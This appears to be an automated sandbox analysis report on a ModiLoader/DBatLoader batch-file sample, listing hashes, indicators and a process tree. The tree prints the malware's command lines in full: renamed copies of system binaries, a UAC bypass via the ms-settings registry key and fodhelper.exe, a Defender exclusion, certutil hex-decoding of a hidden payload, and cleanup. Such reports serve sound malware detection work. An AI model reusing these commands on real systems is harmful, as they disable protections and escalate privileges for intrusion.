Analysis
max time kernel
136s
max time network
135s
platform
windows7_x64
resource
win7-20240221-en
resource tags
arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted
26-03-2024 02:59
Static task
static1
Behavioral task
behavioral1
Sample
e03f365bff6dc4429c91f0ebd0bfdbf6eadaeb3c3cf4b3b30ecb8e9797f46c5e.bat
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
e03f365bff6dc4429c91f0ebd0bfdbf6eadaeb3c3cf4b3b30ecb8e9797f46c5e.bat
Resource
win10v2004-20240226-en
General
Target
e03f365bff6dc4429c91f0ebd0bfdbf6eadaeb3c3cf4b3b30ecb8e9797f46c5e.bat
Size
2.9MB
MD5
0acc894a421b72f77d8f825865710ec4
SHA1
e51bfe768ece4a254a5f85c977fa65dfa963c3b8
SHA256
e03f365bff6dc4429c91f0ebd0bfdbf6eadaeb3c3cf4b3b30ecb8e9797f46c5e
SHA512
4faafabc07bf132657e54b4107b97dc339143439a26802589a5aae94325e38e2a37766a647baa42b1a6ee069aa2bae3f6ffc12eb6b5c7fac64a7ee06cd169f02
SSDEEP
24576:yn8Rm6aVrLy7bOkM75parJLzx60bCNB0PEsNl36h3vKYtKYKCgsX9t6HtzA6GC89:KomdNy7bOT5u9zgApY
Malware Config
Signatures
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

ModiLoader Second Stage 1 IoCs
resource                                                                      yara_rule
behavioral1/memory/1904-54-0x0000000002EC0000-0x0000000003EC0000-memory.dmp  modiloader_stage2

Executes dropped EXE 16 IoCs
pid   Process
2076  alpha.exe
2604  alpha.exe
2724  alpha.exe
2720  xkn.exe
2972  alpha.exe
2412  alpha.exe
2424  kn.exe
2488  alpha.exe
2532  kn.exe
1904  Lewxa.com
312   alpha.exe
2392  alpha.exe
1956  alpha.exe
2788  alpha.exe
2776  alpha.exe
2936  alpha.exe

Loads dropped DLL 8 IoCs
pid   Process
2872  cmd.exe
2872  cmd.exe
2724  alpha.exe
2720  xkn.exe
2720  xkn.exe
2412  alpha.exe
2696  WerFault.exe
2696  WerFault.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 1 IoCs
pid   pid_target  Process       procid_target
2696  1904        WerFault.exe  43

Kills process with taskkill 2 IoCs
pid   Process
2792  taskkill.exe
1984  taskkill.exe

Modifies registry class 5 IoCs
description      ioc                                                                                                Process
Key created      \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\ms-settings\shell\open\command  reg.exe
Key created      \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\ms-settings                     reg.exe
Key created      \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\ms-settings\shell               reg.exe
Key created      \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\ms-settings\shell\open          reg.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users "  reg.exe

Modifies registry key 1 TTPs 1 IoCs
pid   Process
2628  reg.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid   Process
1904  Lewxa.com

Suspicious behavior: EnumeratesProcesses 1 IoCs
pid   Process
2720  xkn.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs
description              pid   Process
Token: SeDebugPrivilege  2720  xkn.exe
Token: SeDebugPrivilege  2792  taskkill.exe
Token: SeDebugPrivilege  1984  taskkill.exe
Suspicious use of WriteProcessMemory 64 IoCs
description                       pid   Process    procid_target
PID 2872 wrote to memory of 2036  2872  cmd.exe    29
PID 2872 wrote to memory of 2036  2872  cmd.exe    29
PID 2872 wrote to memory of 2036  2872  cmd.exe    29
PID 2036 wrote to memory of 3004  2036  cmd.exe    30
PID 2036 wrote to memory of 3004  2036  cmd.exe    30
PID 2036 wrote to memory of 3004  2036  cmd.exe    30
PID 2872 wrote to memory of 2076  2872  cmd.exe    31
PID 2872 wrote to memory of 2076  2872  cmd.exe    31
PID 2872 wrote to memory of 2076  2872  cmd.exe    31
PID 2076 wrote to memory of 3020  2076  alpha.exe  32
PID 2076 wrote to memory of 3020  2076  alpha.exe  32
PID 2076 wrote to memory of 3020  2076  alpha.exe  32
PID 2872 wrote to memory of 2604  2872  cmd.exe    33
PID 2872 wrote to memory of 2604  2872  cmd.exe    33
PID 2872 wrote to memory of 2604  2872  cmd.exe    33
PID 2604 wrote to memory of 2636  2604  alpha.exe  34
PID 2604 wrote to memory of 2636  2604  alpha.exe  34
PID 2604 wrote to memory of 2636  2604  alpha.exe  34
PID 2872 wrote to memory of 2724  2872  cmd.exe    35
PID 2872 wrote to memory of 2724  2872  cmd.exe    35
PID 2872 wrote to memory of 2724  2872  cmd.exe    35
PID 2724 wrote to memory of 2720  2724  alpha.exe  36
PID 2724 wrote to memory of 2720  2724  alpha.exe  36
PID 2724 wrote to memory of 2720  2724  alpha.exe  36
PID 2720 wrote to memory of 2972  2720  xkn.exe    37
PID 2720 wrote to memory of 2972  2720  xkn.exe    37
PID 2720 wrote to memory of 2972  2720  xkn.exe    37
PID 2972 wrote to memory of 2628  2972  alpha.exe  38
PID 2972 wrote to memory of 2628  2972  alpha.exe  38
PID 2972 wrote to memory of 2628  2972  alpha.exe  38
PID 2872 wrote to memory of 2412  2872  cmd.exe    39
PID 2872 wrote to memory of 2412  2872  cmd.exe    39
PID 2872 wrote to memory of 2412  2872  cmd.exe    39
PID 2412 wrote to memory of 2424  2412  alpha.exe  40
PID 2412 wrote to memory of 2424  2412  alpha.exe  40
PID 2412 wrote to memory of 2424  2412  alpha.exe  40
PID 2872 wrote to memory of 2488  2872  cmd.exe    41
PID 2872 wrote to memory of 2488  2872  cmd.exe    41
PID 2872 wrote to memory of 2488  2872  cmd.exe    41
PID 2488 wrote to memory of 2532  2488  alpha.exe  42
PID 2488 wrote to memory of 2532  2488  alpha.exe  42
PID 2488 wrote to memory of 2532  2488  alpha.exe  42
PID 2872 wrote to memory of 1904  2872  cmd.exe    43
PID 2872 wrote to memory of 1904  2872  cmd.exe    43
PID 2872 wrote to memory of 1904  2872  cmd.exe    43
PID 2872 wrote to memory of 1904  2872  cmd.exe    43
PID 2872 wrote to memory of 312   2872  cmd.exe    44
PID 2872 wrote to memory of 312   2872  cmd.exe    44
PID 2872 wrote to memory of 312   2872  cmd.exe    44
PID 2872 wrote to memory of 2392  2872  cmd.exe    45
PID 2872 wrote to memory of 2392  2872  cmd.exe    45
PID 2872 wrote to memory of 2392  2872  cmd.exe    45
PID 2872 wrote to memory of 1956  2872  cmd.exe    46
PID 2872 wrote to memory of 1956  2872  cmd.exe    46
PID 2872 wrote to memory of 1956  2872  cmd.exe    46
PID 2872 wrote to memory of 2788  2872  cmd.exe    47
PID 2872 wrote to memory of 2788  2872  cmd.exe    47
PID 2872 wrote to memory of 2788  2872  cmd.exe    47
PID 2872 wrote to memory of 2776  2872  cmd.exe    48
PID 2872 wrote to memory of 2776  2872  cmd.exe    48
PID 2872 wrote to memory of 2776  2872  cmd.exe    48
PID 2776 wrote to memory of 2792  2776  alpha.exe  49
PID 2776 wrote to memory of 2792  2776  alpha.exe  49
PID 2776 wrote to memory of 2792  2776  alpha.exe  49
Processes
(process tree; each entry lists the image path, the command line, the signatures it triggered and its PID; children are indented under their parent)

C:\Windows\system32\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\e03f365bff6dc4429c91f0ebd0bfdbf6eadaeb3c3cf4b3b30ecb8e9797f46c5e.bat"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2872

    C:\Windows\system32\cmd.exe
      cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
      - Suspicious use of WriteProcessMemory
      PID:2036

        C:\Windows\system32\extrac32.exe
          extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
          PID:3004

    C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      PID:2076

        C:\Windows\system32\extrac32.exe
          extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
          PID:3020

    C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      PID:2604

        C:\Windows\system32\extrac32.exe
          extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          PID:2636

    C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      PID:2724

        C:\Users\Public\xkn.exe
          C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
          - Executes dropped EXE
          - Loads dropped DLL
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          PID:2720

            C:\Users\Public\alpha.exe
              "C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
              - Executes dropped EXE
              - Suspicious use of WriteProcessMemory
              PID:2972

                C:\Windows\system32\reg.exe
                  reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
                  - Modifies registry class
                  - Modifies registry key
                  PID:2628

    C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\e03f365bff6dc4429c91f0ebd0bfdbf6eadaeb3c3cf4b3b30ecb8e9797f46c5e.bat" "C:\\Users\\Public\\Lewxa.txt" 9
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      PID:2412

        C:\Users\Public\kn.exe
          C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\e03f365bff6dc4429c91f0ebd0bfdbf6eadaeb3c3cf4b3b30ecb8e9797f46c5e.bat" "C:\\Users\\Public\\Lewxa.txt" 9
          - Executes dropped EXE
          PID:2424

    C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      PID:2488

        C:\Users\Public\kn.exe
          C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
          - Executes dropped EXE
          PID:2532

    C:\Users\Public\Libraries\Lewxa.com
      C:\\Users\\Public\\Libraries\\Lewxa.com
      - Executes dropped EXE
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:1904

        C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 752
          - Loads dropped DLL
          - Program crash
          PID:2696

    C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
      - Executes dropped EXE
      PID:312

    C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
      - Executes dropped EXE
      PID:2392

    C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
      - Executes dropped EXE
      PID:1956

    C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
      - Executes dropped EXE
      PID:2788

    C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      PID:2776

        C:\Windows\system32\taskkill.exe
          taskkill /F /IM SystemSettings.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID:2792

    C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
      - Executes dropped EXE
      PID:2936

        C:\Windows\system32\taskkill.exe
          taskkill /F /IM SystemSettingsAdminFlows.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID:1984
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize
130KB
MD5
d74d9148a2533e8fd2c55f7f78d464ad
SHA1
8a207d8d2ac8e0a6f06cdb38a62af62f16dd97ef
SHA256
cfd3ae792012746b73f3173b459e933062c8a04505404fa36365ad735a4eda75
SHA512
27f71cb70d268034fedbddef821395a4eacbf082e42d0493db16c179feb719d1da2919aa43eadfaa6e95265c0bbb83050ab9dc80ca5ea15e6adee71eb2c41d2e

Filesize
1.0MB
MD5
701a1b8de275a64ad562d862d7e117d4
SHA1
a6dcd9f802a20fa07bd2f569b0761244ab5803a7
SHA256
f5ad3a45f4bea88e28aa2c541ee13ab28fa68a29af572ce2ca02960464d601ad
SHA512
085a5becd2c1ceac9a0dfefdc0dc663d598062b2bfef24e3709b0998924f98836eaa0d66bc21dbda9842fead17443fbd3b69febd620639b8e1921d3b0e797a32

Filesize
337KB
MD5
5746bd7e255dd6a8afa06f7c42c1ba41
SHA1
0f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256
db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA512
3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

Filesize
1.1MB
MD5
ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1
ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA256
1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA512
4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

Filesize
462KB
MD5
852d67a27e454bd389fa7f02a8cbe23f
SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d